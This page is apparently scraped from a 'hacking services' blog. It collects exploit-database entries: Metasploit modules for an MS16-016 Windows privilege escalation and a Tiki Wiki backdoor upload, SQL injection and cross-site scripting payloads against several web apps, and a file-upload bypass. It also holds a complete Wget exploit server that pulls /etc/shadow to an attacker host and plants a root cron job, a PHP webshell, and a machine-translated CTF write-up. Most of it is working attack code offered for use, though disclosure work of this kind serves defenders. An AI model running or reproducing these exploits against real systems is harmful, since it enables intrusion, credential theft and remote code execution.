##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
'Description' => %q{
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
the specified payload within the context of the elevated process.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tamas Koczka', # Original Exploit
'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => 'false'
},
'Targets' =>
[
[ 'Windows 7 SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2016-0051' ],
[ 'MSB', 'MS16-016' ]
],
'DisclosureDate' => 'Feb 09 2016',
'DefaultTarget' => 0
}))
end
def check
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
print_status("Launching notepad to host the exploit...")
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
library_path = ::File.expand_path(library_path)
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected ... injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
thread = process.thread.create(exploit_mem + offset, payload_mem)
sleep(3)
print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863532377
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=786
The attached ATF file causes a heap overflow in ATF processing. To reproduce this issue, put LoadImage.swf and test.png on a remote server, and visit http://127.0.0.1/LoadImage.swf?img=test.png.
To differentiate this from other ATF issues, this is an overflow in decompressing alphas when an image has a height of 1 pixel.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40087.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=788
There is a heap overflow when loading the attacked JXR file in Adobe Flash. To reproduce, load the attached file using LoadImage.swf?img=12.atf.
This issue can be a bit difficult to reproduce, as the crash occurs when the player is destroyed, so the crash screen doesn't always show up on the Player. The easiest way to detect the issue is to attach a debugger to the Player and refresh a few times.
Took a closer look at this, it is a UaF of plane->model_hp_buffer in the open-source JXR component.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40088.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=790
Loading the attached image causes heap corruption due to LMZA property decoding. To reproduce the issue, load the attach file '6' using LoadImage.swf as follows:
LoadImage.swf?img=6
The issue sometimes takes multiple refreshes to crash
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40089.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=793
There is a heap overflow in ATF impage packing. To reproduce the issue, load the attach file '129' using LoadImage.swf as follows:
LoadImage.swf?img=129
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40090.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the webserver user.
The issue comes with one of the 3rd party components. Name of that components is
ELFinder -version 2.0-. This components comes with default example page which
demonstrates file operations such as upload, remove, rename, create directory etc.
Default configuration does not force validations such as file extension, content-type etc.
Thus, unauthenticated user can upload PHP file.
The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
},
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
[ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 11 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
], self.class)
end
def check
url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(url)
)
if res && res.code == 200
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
filename = rand_text_alpha(8 + rand(4)) + '.php'
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
print_status("Uploading backdoor file.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 200
print_good("Backdoor successfully created.")
else
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
end
print_status("Trigging the exploit...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
}, 5)
end
end
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++
# Exploit Title: SQL Injection In 24 Online Billing API
# Date: 03/07/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://24onlinebilling.com
# Software Name:24online Model SMS_2500i
# Version: 8.3.6 build 9.0
# Tested on: Ubuntu Linux
Potentially others versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
There is complete informational disclosure over the stored database.
I tried to contact them to disclose and get the vulnerability patched, but they did not reply positively.
AWBS v2.9.6 Multiple Remote Vulnerabilities
Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP
Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.
Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache
PHP/5.3.28
MySQL/5.5.50-cll
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
08.06.2016
--
1. SQL Injection:
-----------------
Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
2. Cross-Site Scripting (Stored):
---------------------------------
http://localhost/admin/cmanage.php
Parameters: reason (POST)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)
Payload(s):
Content-Disposition: form-data; name="hd_name"
"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"
"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"
<img src=x onerror=alert(3)>
-----------------------------28698210634144
3. Cross-Site Scripting (Reflected):
------------------------------------
http://localhost/admin/useradmin.php
Parameters: list (POST)
http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)
http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)
http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution
# Date: 2016-07-06
# Product: PaKnPost Pro
# Vendor Homepage: http://www.paknpost.org
# Software Link: https://sourceforge.net/projects/paknpost/
# Version: <=1.14
# Tested on: Windows, Linux
# Exploit Authors: Edvin Rustemagic, Grega Preseren
# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren
===========
Description
===========
File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution.
=======
Details
=======
File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368).
Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204).
Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges.
========
Timeline
========
2016-03-15 Vulnerability discovered at customer's deployment.
2016-06-13 PoC completed for Linux and Windows platforms.
2016-06-13 Author/Maintainer at SourceForge has been notified.
2016-06-21 Patch written and delivered to Author/Maintainer.
2016-06-23 Patch publicly released.
2016-07-06 Exploit submitted to Exploit-DB.
=======================
Windows PoC Environment
=======================
- Windows Server 2003 R2 SP2
- Apache 2.2.10
- ActivePerl 5.8.0.806
=====================
Linux PoC Environment
=====================
- Debian 8.3
- Apache 2.4.10
- Perl 5.20.2
=======
Exploit
=======
1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory.
2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check.
For example:
POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1
Host: paknpost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://paknpost/cgi-bin/pnp/select.cgi
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6077763223847
Content-Length: 6087
-----------------------------6077763223847
Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi"
Content-Type: application/octet-stream
==============
Solution/Patch
==============
a. Update to version 1.15
b. Or apply the following patch:
--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200
+++ select_.cgi 2016-06-14 10:18:37.864000000 +0200
@@ -201,6 +201,9 @@
}
# Create the new Holding Area
+if ($sessionid =~ m/[^\w]/) {
+ &error(file_write);
+}
$user_dir = $upload_dir.$sessionid;
if (-d "$user_dir")
{
@@ -365,7 +368,7 @@
if ($file_check)
{
# Exclude all except acceptable file extensions as a fist cut to file checks
- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
+ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
$debug1 = "Passed";
=============================================
- Release date: 06.07.2016
- Discovered by: Dawid Golunski
- Severity: High
- CVE-2016-4971
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or
compromised web server) can be tricked into saving an arbitrary remote file
supplied by an attacker, with arbitrary contents and filename under
the current directory and possibly other directories by writing to .wgetrc.
Depending on the context in which wget is used, this can lead to remote code
execution and even root privilege escalation if wget is run via a root cronjob
as is often the case in many web application deployments.
The vulnerability could also be exploited by well-positioned attackers within
the network who are able to intercept/modify the network traffic.
IV. DESCRIPTION
-------------------------
Because of lack of sufficient controls in wget, when user downloads a file
with wget, such as:
wget http://attackers-server/safe_file.txt
an attacker who controls the server could make wget create an arbitrary file
with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect
containing FTP server reference in response to the victim's wget request.
For example, if the attacker's server replies with the following response:
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache
wget will automatically follow the redirect and will download a malicious
.bash_profile file from a malicious FTP server.
It will fail to rename the file to the originally requested filename of
'safe_file.txt' as it would normally do, in case of a redirect to another
HTTP resource with a different name.
Because of this vulnerability, an attacker is able to upload an arbitrary file
with an arbitrary filename to the victim's current directory.
Execution flow:
victim@trusty:~$ wget --version | head -n1
GNU Wget 1.17 built on linux-gnu.
victim@trusty:~$ pwd
/home/victim
victim@trusty:~$ ls
victim@trusty:~$
victim@trusty:~$ wget http://attackers-server/safe-file.txt
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ftp://192.168.57.1/.bash_profile [following]
=> ‘.bash_profile’
Connecting to 192.168.57.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE .bash_profile ... 55
==> PASV ... done. ==> RETR .bash_profile ... done.
Length: 55 (unauthoritative)
.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s
2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55]
victim@trusty:~$ ls -l
total 4
-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile
victim@trusty:~$
This vulnerability will not work if extra options that force destination
filename are specified as a paramter. Such as: -O /tmp/output
It is however possible to exploit the issue with mirroring/recursive options
enabled such as -r or -m.
Another limitation is that attacker exploiting this vulnerability can only
upload his malicious file to the current directory from which wget was run,
or to a directory specified by -P option (directory_prefix option).
This could however be enough to exploit wget run from home directory, or
within web document root (in which case attacker could write malicious php files
or .bash_profile files).
The current directory limitation could also be bypassed by uploading a .wgetrc
config file if wget was run from a home directory.
By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget
settings such as destination directory for all downloaded files in future,
as well as set a proxy setting to make future requests go through a malicious
proxy server belonging to the attackers to which they could send further
malicious responses.
Here is a set of Wget settings that can be helpful to an attacker:
dir_prefix = string
Top of directory tree—the same as ‘-P string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
recursive = on/off
Recursive on/off—the same as ‘-r’.
timestamping = on/off
Allows to overwrite existing files.
cut_dirs = n
Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).
http_proxy
HTTP Proxy server
https_proxy
HTTPS Proxy server
output_document = file
Set the output filename—the same as ‘-O file’.
input = file
Read the URLs from string, like ‘-i file’.
metalink-over-http
Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers.
Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.
Full list of .wgetrc options can be found in:
https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands
V. PROOF OF CONCEPT EXPLOIT
-------------------------
1) Cronjob with wget scenario
Often wget is used inside cronjobs. By default cronjobs run within home
directory of the cronjob owner.
Such wget cronjobs are commonly used with many applications used to download
new version of databases, requesting web scripts that perform scheduled tasks
such as rebuilding indexes, cleaning caches etc.
Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on
the Internet with exploitable wget cronjobs:
https://codex.wordpress.org/Post_to_your_blog_using_email
https://docs.moodle.org/2x/ca/Cron
http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site
http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel
Such setup could be abused by attackers to upload .bash_profile file through
wget vulnerability and run commands in the context of the victim user upon
their next log-in.
As cron runs priodically attackers, could also write out .wgetrc file in the
first response and then write to /etc/cron.d/malicious-cron in the second.
If a cronjob is run by root, this would give them an almost instant root code
execution.
It is worth noting that if an attacker had access to local network they could
potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect
responses to wget requests.
This issue could also be exploited by attackers who have already gained
access to the server through a web vulnerability to escalate their privileges.
In many cases the cron jobs (as in examples above) are set up to request
various web scripts e.g:
http://localhost/clean-cache.php
If the file was writable by apache, and attacker had access to www-data/apache
account, they could modify it to return malicious Location header and exploit
root cronjob that runs the wget request in order to escalate their privileges
to root.
For simplicity we can assume that attacker already has control over the server
that the victim sends the request to with wget.
The root cronjob on the victim server may look as follows:
root@victim:~# cat /etc/cron.d/update-database
# Update database file every 2 minutes
*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1
In order to exploit this setup, attacker first prepares a malicious .wgetrc
and starts an FTP server:
attackers-server# mkdir /tmp/ftptest
attackers-server# cd /tmp/ftptest
attackers-server# cat <<_EOF_>.wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
_EOF_
attackers-server# sudo pip install pyftpdlib
attackers-server# python -m pyftpdlib -p21 -w
At this point attacker can start an HTTP server which will exploit wget by
sending malicious redirects to the victim wget's requests:
---[ wget-exploit.py ]---
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
---[ eof ]---
Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes
the aforementioned cronjob with wget.
The output should look similar to:
---[ wget-exploit.py output ]---
attackers-server# python ./wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 192.168.57.1:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /database.db by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc
We have a volunteer requesting /database.db by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
...cut...
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
---[ output eof ]---
As we can see .wgetrc got uploaded by the exploit. It has set the post_file
setting to /etc/shadow.
Therefore, on the next wget run, wget sent back shadow file to the attacker.
It also saved the malicious cronjob script (ROOT_CRON variable) which should
create a file named /root/hacked-via-wget, which we can verify on the victim's
server:
root@victim:~# cat /etc/cron.d/wget-root-shell
* * * * * root /usr/bin/id > /root/hacked-via-wget
root@victim:~# cat /root/hacked-via-wget
uid=0(root) gid=0(root) groups=0(root)
2) PHP web application scenario
If wget is used within a PHP script e.g.:
<?php
// Update geoip data
system("wget -N -P geoip http://attackers-host/goeip.db");
?>
An attacker who manages to respond to the request could simply upload a PHP
backdoor of:
<?php
//webshell.php
system($_GET['cmd']);
?>
by using the wget-exploit script described in example 1.
After the upload he could simply execute the script and their shell
command by a GET request to:
http://victims-php-host/geoip/webshell.php?cmd=id
VI. BUSINESS IMPACT
-------------------------
Affected versions of wget that connect to untrusted (or compromised) web
servers could be tricked into uploading a file under an arbitrary name, or
even path (if wget is run from a home directory).
Depending on the context in which wget is used, this could lead to
uploading a web shell and granting the attacker access remote access to the
system, or privilege escalation. It could be possible for attackers to escalate
to root user if wget is run via root cronjob as it is often the case in web
application deployments and is recommended in some guides on the Internet.
The vulnerability could also be exploited by well-positioned attackers within
the networ who are able to intercept/modify the network traffic.
VII. SYSTEMS AFFECTED
-------------------------
All versions of Wget before the patched version of 1.18 are affected.
VIII. SOLUTION
-------------------------
Update to wget version 1.18 as advertised by the vendor at:
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
Linux distributions should update their wget packages. It is recommended
to update wget manually if an updated package is not available for your
distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
http://www.ubuntu.com/usn/usn-3012-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
06.07.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
web
x1ct34m_api_system
著者:wh1sper
タイトル説明:
APIセキュリティの新しい時代では、セキュリティサークルは変更を拡大しています。
あなたは巨大な波を作っていますか?あなたは空を覆うあなたの手を持っていますか?以前のパートナーを保護または放棄することを選択しますか?
Target:http://129.211.173.64:582/
添付のリンク:
https://wwn.lanzoui.com/iuodwwyfdxc
hint1:
バイパス403への隠されたAPI
hint2:
Jolokia Readfile
テストポイント:スプリングブートアクチュエータの不適切な構成によって引き起こされるAPIセキュリティの問題
アクチュエーター /マッピングにアクセスすることにより、 /アクチュエーター /ジョロキア(ローカルIPの制限、直接アクセス返品403)と非表示のAPIインターフェイス /ユーザー /リストがあることがわかります。
または、Apikitを直接使用して /user /list:
postアクセス /ユーザー /リスト、XML形式のデータを返します
とても当然、私はxxeについて考えました。 WAFを追加し、ファイルを直接読み取ることを許可しませんでした。
(ここには予期せぬことをした2人のマスターがいます。XXEのWAFはうまく書かれていませんでした。そのため、テイクアウトフラグを盲目的に呼び出すことができます。ターゲットマシンがネットワークから出ないように制限し、テイクアウトできませんでした。)
しかし、私たち全員が知っているように、XXEはSSRFになる可能性があります。
その後、SSRFは /アクチュエータ /ジョロキアと一緒に使用できます。 Dockerプロキシのポートであるため、ローカルサービスポートを取得するには、最初にアクセス /アクチュエーター /envが必要です。
その後、SSRFを構築します。
/jolokia /listによって返されるデータは長すぎるため、内部のいくつかの特別なシンボルはXMLドキュメント構造が同じエンティティ内で開始および終了する必要があると報告しています。
